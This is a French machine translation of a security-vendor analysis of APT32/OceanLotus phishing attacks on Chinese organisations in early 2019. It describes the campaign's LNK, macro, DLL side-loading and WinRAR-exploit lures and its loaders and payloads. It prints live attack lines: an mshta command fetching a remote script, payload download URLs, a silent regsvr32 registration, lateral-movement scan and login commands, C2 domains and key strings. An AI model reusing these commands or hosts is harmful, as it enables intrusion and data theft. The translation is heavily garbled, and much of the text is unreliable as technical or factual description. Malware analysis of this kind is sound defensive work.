Sea Lotus APT a organis� le premier trimestre de 2019 contre la technologie de la Chine r�v�le des attaques

I. Contexte

� Sea Lotus � (�galement connu sous le nom APT32, OceanLotus), est consid�r� comme l'organisation attaque APT du Vietnam, actif depuis 2012, a men� des attaques contre des cibles sensibles en Chine, ces derni�res ann�es, men� des attaques contre la Chine continentale de plus l'un de l'organisation d'attaque active APT.

Au cours du premier trimestre de 2019, Tencent Yu voir les centres de renseignement de menace constante de l'organisation pour d�tecter les attaques contre le gouvernement en Chine continentale, les agences maritimes, le secteur des entreprises, des institutions de recherche. En outre, l'organisation met constamment � jour leur arsenal attaque, que ce soit sous la forme de p�che � l'app�t, le chargement de la charge utile, d�placement lat�ral et ainsi de suite. On notera en particulier, nous avons constat� que l'organisation a �t� adress�e � un des modules malveillants diff�rents avec des machines diff�rentes, de sorte que m�me si un titre de fichier malveillant fournisseurs de capturer, mais aussi parce que pas de caract�ristiques pertinentes des machines ne peuvent pas d�crypter la charge utile finale, ne peut pas conna�tre les activit�s de suivi .

�v�nements Diamond mod�le est la suivante:

En second lieu, l'analyse technique

1, l'attaque initiale

de fa�on malicieuse de livraison de fichiers est toujours la plupart des attaques de harpon de mani�re commune, mots-cl�s phishing comprennent � la formation des cadres �, � Performance �, � direction de travail �, � contr�le de la discipline et de la supervision � et autres messages connexes sont suivants comme:

En plus de l'attaque a �galement ajout� le contenu sensible du th�me, pour attirer l'utilisateur qui a ouvert l'attaque, comme l'image sensible:

2, le type d'app�t

De nombreux types de livraison d'app�ts malveillants du premier trimestre de 2019, y compris le blanc et le noir, LNK, fichier doc avec le package compress� WinRARACE (CVE-2018-20250) et d'autres vuln�rabilit�s.

1) Barker

2) LNK malveillant

3) doc document illicite avec des macros

4) comprim� avec WinRAR vuln�rabilit� ACE (CVE-2018-20250):

3, fichiers malveillants implant

1) Analyse de LNK malveillant

En Janvier une vague d'attentats, l'organisation compresse toute la livraison de colis, sont stock�s un LNK malveillant, mais tous les fichiers LNK sont similaires (adresse ne peut �tre ex�cut�e, mais le m�me contenu). ic�ne du fichier .lnk d�guis� en ic�ne de texte. Il est int�ressant de noter que l'ic�ne LNK obtiendra du r�seau, donc si le serveur distant a �t� arr�t�, cela conduira au ph�nom�ne LNK aucune ic�ne. De plus, il en r�sultera m�me sinon LNK double-clic, il suffit d'ouvrir le r�pertoire o� LNK, il y aura le ph�nom�ne des connexions r�seau.

La raison en est: l'explorateur d�termination du temps de LNK ira � l'ic�ne de r�solution, et cette ic�ne configuration LNK sur le r�seau, et donc passe automatiquement � t�l�charger, mais seulement t�l�charger, ne pas effectuer, ne cherchez pas le fichier .lnk d'ex�cution, fuite propre adresse IP, mais il ne causera pas des chevaux de Troie informatiques.

Double-cliquez pour ex�cuter LNK, ex�cutera la commande suivante:

C: \ Windows \ SysWOW64 \ mshta.exehttp: //api.baidu-json.com/feed/news.html

Ce qui, en fait news.html un fichier de script VBS:

mstha Ex�cuter script de d�cryptage du contenu sera stock� dans ce script apr�s, et stock� sous le r�pertoire% temp%, les noms de fichiers sont:

7b95ffab-3a9c-494a-a584-9c48dc7aa6a7.tmp 7b95ffab-3a9c-494a-a584-9c48dc7aa6a7.exe 7b95ffab-3a9c-494a-a584-9c48dc7aa6a7.log 7b95ffab-3a9c-494a-a584-9c48dc7aa6a7.env

algorithme de d�chiffrement est la suivante:

Ensuite, appelez le syst�me est livr� avec Odbcconf.exe, sera 7b95ffab-3a9c-494a-a584-9c48dc7aa6a7.tmp (dll fichier) pour charger. Le dernier taskkill.exe d'appel, mettant fin � processus mshta.exe:

Mais la chose �trange est que, en raison de l'algorithme de probl�mes de d�cryptage, conduisant � la d�chiffrement finale �choue donc la mise en uvre du LNK, l'utilisateur n'a pas r�ellement pris:

On peut donc deviner que le chemin est encore en phase de test, en raison de la n�gligence ou l'auteur. Mais dans les attaques ult�rieures, nous n'avons pas d�tect� de nouveau � l'attaque.

2) documents doc avec macros

Livraison d'un document avec des macros, l'organisation est un app�t plus couramment utilis� malveillants, tels que:

De plus, il y a beaucoup de s�curit� sur les coll�gues d'app�t Twitter expos� la fa�on dont l'organisation:

toujours aussi sur le suspect de VT avec l'interaction des chercheurs pertinents:

Bien s�r, nous pensons que l'utilisateur peut juste �tre une blague entre le chercheur de s�curit�.

Apr�s la mise en uvre de la macro, copiez d'abord le document original sous% temp%, nom de fichier au nom al�atoire:

Ensuite, d�crypter une nouvelle macro VBA:

D�finissez ensuite le registre

"HKEY_CURRENT_USER \ Software \ Microsoft \ Office \ 12.0 \ Word \ Security \ AccessVBOM" valeur de 1:

Enfin, les fichiers doc ouverts avant de copier et de supprimer les macros VBA d'origine, la nouvelle macro VBA ajout� � ce d�crypt�es, et d�marrer les fonctions macro VBA x_N0th1ngH3r3:

x_N0th1ngH3r3 fonction de d�chiffrement est �galement une section des nouvelles macros VBA, appelez la nouvelle fonction m�me de x_N0th1ngH3r3 VBA:

D�cryptage � nouveau but de VBA est de charger et d'ex�cuter le shellcode d�crypt�e:

Shellcode d�crypter un fichier DLL et charg� en m�moire, ex�cuter la fonction DllEntry:

fonction DllEntry premier extrait le fichier de ressources et le d�chiffrer:

contenu d�chiffr�, y compris la finale hors du rat et des informations de configuration associ�es:

Ensuite, le rat sera d�chiffr� dans l'expansion de la m�moire, et trouver l'adresse de fonction CreateInstance et des informations de configuration d'appel entrant la fonction:

Configuration 4 connexion de communication C & C en utilisant https:

cloud.360cn.info dns.chinanews.network aliexpresscn.net chinaport.org

Autres d�tails techniques Royal Voir l'article publi� l'analyse du lotus de la mer de l'article (voir l'annexe) avec l'avant

3) Barker

Barker m�me organisation commune du type d'app�t, et au cours de l'attaque proprement dite, �galement utilis� � plusieurs reprises.

Par exemple, le premier � utiliser le mot pour attaquer le fichier principal blanc, charger le Wwlib.dll de fichier malveillant:

App�ter les documents de lib�ration dans un r�pertoire temporaire, et ouvert:

Puis � nouveau blanc avec l'art noir en utilisant le programme principal 360se livres blancs, charg�s chrome_elf.dll malveillants:

En plus d'atteindre la fonction chrome_elf.dll appelle le programme par d�faut original txt ouvert, fichier doc, il sera �galement se connecter au r�seau pour t�l�charger la phase suivante des fichiers malveillants et ex�cuter directement dans la m�moire:

T�l�charger Adresse: https: //officewps.net/cosja.png

En outre, d'autres �chantillons malveillants T�l�charger comme: https: //dominikmagoffin.com/subi.png,https: //ristineho.com/direct.jpg et ainsi de suite.

Cheval de Troie est shellcode t�l�charg� peut �tre utilis� comme une ex�cution directe du code, l'ex�cution apr�s avoir t�l�charg� directement dans la m�moire:

fonction shellcode est d'extraire la fonction de d�cryptage � partir d'un fichier PE est charg�:

Le fichier PE est CobaltStrike cheval de Troie, et la mer de Troie avant l'organisation Lotus utilise exactement la m�me chose, C2 est https://officewps.net/safebrowsing/rd/CltOb12nLW1IbHehcmUtd2hUdmFzEBAY7-0KIOkUDC7h2.

De plus, nous avons �galement constat� que une attaque relativement plus t�t, l'utilisation du m�me logiciel pour g�rer 360 � faire est blanc avec porte-noir:

L'exemple lit c: \ windows \ fichier system32.ini, lire une cl� octet:

1 lecture et les ressources d�crypt�es sous l'ic�ne de ressources, obtenir une wsc_proxy.exe cha�ne, comparez si le processus actuel est wsc_proxy.exe, si elle continue:

Lire leur adresse de segment .text, sinon lu avec succ�s lors de la lecture de safemon.dll:

Lire ummrzhwp.Emf, d�cryptage en utilisant la m�me m�thode, apr�s le chargement:

Le shellcode final est CobaltStrike, ne pas les r�p�ter.

4) comprim� avec WinRAR ACE (CVE-2018-20250) vuln�rabilit�

Apr�s avoir extrait l'archive, extraire le doc aura un traitement d'image floue de documents:

En plus de d�compresser un fichier compress�, mais aussi dans le r�pertoire de d�marrage: version (C \ Users \ Administrateur \ AppData \ Roaming \ Microsoft \ Windows \ StartMenu \ Programs \ Startup) un fichier auto-extractible:

Il y a un d�ball�s {7026ce06-ee00-4ebd-b00e-f5150d86c13e} fichier .ocx, puis ex�cutez la commande

regsvr32 / s / i {7026ce06-ee00-4ebd-b00e-f5150d86c13e} .ocx effectu�e.

D�tails techniques de la dll OCX m�me partie de la m�moire de l'analyse pr�c�dente du document macro, ne pas les r�p�ter ici.

4, a publi� une analyse de documents

Apr�s la chute de la machine de l'attaquant, l'attaquant va continuer les machines contr�l�es � l'attaque: la sortie d'une nouvelle machine de liaison par le script cheval de Troie, ce cheval de Troie ne peut fonctionner sur la machine pour r�aliser deux chargeurs, loader techniques est l'utilisation du blanc et du noir, tels que l'utilisation googleupdate.exe + goopdate.dll, comprenant en outre en outre, ces noms:

KuGouUpdate.exe + goopdate.dll AdobeUpdate.exe + goopdate.dll Bounjour.exe + goopdate.dll

1) Analyse de la chargeuse 1

Sch�ma suit:

Apr�s les ex�cute Troie l'allocation d'espace m�moire, copie espace shellcode pour ex�cuter une nouvelle application, la fonction shellcode est d'utiliser le nom de l'ordinateur local + mot de passe pour configurer le hachage comme la cl� pour d�chiffrer le playload final et playload v�rifier, apr�s le succ�s de la cr�ation d'une nouvelle enfiler ex�cution playload.

2) Analyse du chargeur 2

Diagramme est la suivante:

Loader 2 est l'ajout d'une couche de cl� de cryptage al�atoire sur la base du chargeur 1 sur la meilleure lutte d�tecter les logiciels d'analyse de s�curit�, et l'analyse d'interf�rence pour bac � sable automatis� en accrochant les fonctions API flux cheval de Troie, puis d'ex�cution du chaos.

Tout d'abord, dll fonctions de LdrLoadDll de crochet au niveau du point d'entr�e, l'appel d'API prend le relais ex�cution lors de l'ex�cution flux d�chiffr� shellcode de d�cryptage de code int�gr� dans le mot de passe al�atoire, est d'utiliser la fonction shellcode configur� nom d'ordinateur local + mot de passe de hachage en tant que cl� pour d�crypter le dernier playload et playload v�rifier, cr�er un nouveau thread d'ex�cution playload apr�s le succ�s:

un comportement coh�rent de shellcode d�chiffr� avec loader1:

pr�fixe de chiffrement sont associ�es:

AMDservice justletMeholdU 360zipfuckyou PJFgaJunlmzRdjx79txe sadasddsadsa @ 350sadsad 210.72.156.203 triste @ 1232198sadasd fuckthis @ wwww360sad 1KR20RYMPVYDRGU @ sasd GoogleCompany ......

La derni�re playload Il y a trois chevaux de Troie sont communs lotus mer, respectivement CobaltStrike, Gh0st, Denis.

RAT1: CobaltStrike

RAT2: r�vision Gh0st

Le cheval de Troie soup�onn� d'utiliser la r�vision de gh0st open source, support tcp, UPD, les paquets sont compress�s en utilisant zlib.

RAT3: Denis

5, et � fournir le mouvement lat�ral droit

De plus, nous avons �galement constat� que la mer Lotus continuera d'�tre attaqu� dans le r�seau pour un mouvement lat�ral, afin de p�n�trer dans plusieurs machines:

Utilisation au sein nbt.exe segment de r�seau de balayage, qui peut �tre collect�e par la force brute ou le partage du r�seau d'informations d'identification au sein du r�seau d'utilisateurs et mots de passe, tels que:

C: WINDOWS \ \ \ system32 cmd.exe / C nbt.exe 192.168.1.105/24;

Voir par commande net user ou acc�der � d'autres h�te connexes au sein du r�seau, tels que:

net user \ 192.168.1.83 \ C # 3 /U:192.168.1.183\Administrator 123456; hachage NTLM.

De plus, le pr�fixe de cryptage dans le paragraphe pr�c�dent, nous avons �galement une adresse IP: 210.72.156.203 chiffrement comme pr�fixe, nous avons vu les demandes de Tencent Antu:

On peut trouver, peut �tre associ�e � nbtscan-1.0.35.exe et mmc.exe, il est �galement associ� � la p�n�tration du r�seau.

Une fois le r�seau perm�at �galement dans la machine, l'attaquant a �galement fait chauve-souris et �mis le script js pour effectuer des op�rations ult�rieures.

Les noms de script tels que encode.js, 360se.txt, 360PluginUpdater.js, 360DeepScanner.js, 360Tray.js et ainsi de suite.

Tels que: 360PluginUpdater.bat + 360PluginUpdater.js

fonction de sortie 360PluginUpdater.bat est de script Crypter 360PluginUpdater.dat, apr�s le changement de nom d'ach�vement 360PluginUpdater.js, et l'ex�cuter:

360PluginUpdater.js est crypt� de script:

Apr�s une s�rie de finale d�crypt�es � l'aide d'un script apr�s avoir effectu� eval de d�cryptage:

Apr�s le d�cryptage et la norme base64 obtenue apr�s deux loader objets s�rialis�s et playload, et un proc�d� chargeur LoadShell appel dans la m�moire.

Le chargeur est pdb: E: \ PRIV \ Framework \ \ tools codes \ exe2js \ loader \ obj \ loader.pdb de la presse, sa fonction est d'allouer de la m�moire, effectuer le chargeur de d�cryptage playload:

Code chargement t�te portant la charge utile PE:

Le dernier appel ReflectiveLoader obtenir dll charge de la m�moire:

La finale est de contr�le � distance de la plate-forme d'attaque CobaltStrike:

Troisi�mement, l'analyse de l'attaquant

Phishing e-mails � partir du nom de messagerie pour le point de vue de cette attaque, l'attaque a pris l'aide d'un e-mail Netease et 126.com 163.com libre, comme baixiao ****** @ 126.com, duancongrui ** @ 163 .com et ainsi de suite. les formats de nom Mail sont au nom + sous forme num�rique. Il y a quelques caract�ristiques des noms chinois.

En outre, l'enregistrement du domaine C & C, comme cloud.360cn.info, chinaport.org, dns.chinanews.network, order.dianpingsh.com aussi avec diff�rentes caract�ristiques chinoises.

De phishing contenu e-mail et des pi�ces jointes, l'attaquant des conditions nationales de la Chine et des informations connexes ont aussi beaucoup de compr�hension.

IV R�sum�

L'un des plus actifs des organisations mer APT organisation Lotus au cours des derni�res ann�es, les attaques contre les secteurs sensibles en Chine continentale, il est en constante �volution, et mettre � jour son arsenal d'attaque, le logiciel de s�curit� de by-pass pour atteindre l'objectif de la d�fense. Le chargement en constante �volution, le proc�d� de confusion, une vari�t� d'autres formes d'app�t, utiliser la nouvelle attaque Nday, tels que l'attaque de l'onde WinRAR ACE (CVE-2018-20250). En plus de l'arsenal constamment mis � jour, l'organisation est �galement tout � fait au courant de la situation en Chine, y compris la politique, les habitudes, etc., ce qui rend aussi le personnel de confusion associ�e, est une attaque r�ussie augmente le taux de r�ussite.

De plus, l'organisation est en constante expansion de la port�e de l'attaque, en plus des organismes gouvernementaux, des agences maritimes, le D�partement du commerce, des unit�s de qualit� inf�rieure �nergie, les institutions de recherche les attaques subies sont en constante augmentation, alors que les attaques contre les personnes, en tant que professeur, avocats les attaques de phishing sont constamment men�es.

Par cons�quent, nous rappelons les d�partements concern�s et le personnel des institutions pertinentes et d'am�liorer efficacement la sensibilisation � la s�curit� nationale, de sensibiliser la s�curit� du r�seau, ne vous laissez pas berner par des informations de phishing, afin de ne pas causer des dommages importants � la s�curit� nationale.

Cinq recommandations de s�curit�

1. Ne pas ouvrir les pi�ces jointes de courrier �lectronique provenant de sources inconnues;

2, les correctifs du syst�me en temps opportun et de logiciels correctifs importants;

3. Manipuler les documents Office, � moins que les documents confirmant la source fiable, pleinement conscient des cons�quences du document ouvert, ou ne doit pas permettre au code de macro au bureau ouvert;

* Auteur: femme de m�nage informatique Tencent, tir� � part FreeBuf.COM

Route de la soie

Apprenez � conna�tre la Chine

Sea Lotus APT a organis� le premier trimestre de 2019 contre la technologie de la Chine r�v�le des attaques